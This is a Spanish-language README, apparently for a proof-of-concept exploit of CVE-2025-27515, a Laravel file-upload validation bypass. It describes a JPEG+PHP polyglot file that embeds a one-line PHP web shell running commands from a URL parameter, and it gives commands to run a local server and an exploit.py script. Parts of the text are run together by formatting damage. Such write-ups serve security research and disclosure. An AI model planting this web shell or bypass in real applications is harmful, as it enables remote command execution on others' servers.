
PoC de CVE-2025-27515
Una demostración práctica de CVE-2025-27515, una vulnerabilidad de omisión de validación de carga de archivos en Laravel Framework (≤ 12.0.0).
CVE-2025-27515 es una omisión de validación que permite a los atacantes eludir las restricciones de carga de archivos cuando las aplicaciones Laravel usan patrones de validación comodín (files.*). La vulnerabilidad permite cargar archivos maliciosos explotando debilidades en la forma en que Laravel procesa las cargas de archivos basadas en arrays.
Gravedad: Media/Alta
CWE: CWE-20 (Validación de Entrada Incorrecta)
El exploit utiliza un archivo políglota JPEG+PHP que:
FF D8 FF E0) para omitir la validación del tipo MIME<?php system($_GET['cmd']); ?>).jpg para pasar las comprobaciones de extensión de archivophp artisan serve
# Access at http://localhost:8000/upload
Versión Python:
pip3 install -r requirements.txt
python3 exploit.py http://localhost:8000
SOLO PARA PRUEBAS DE SEGURIDAD EDUCATIVAS Y AUTORIZADAS
Por Guaxinim | Investigación en Ciberseguridad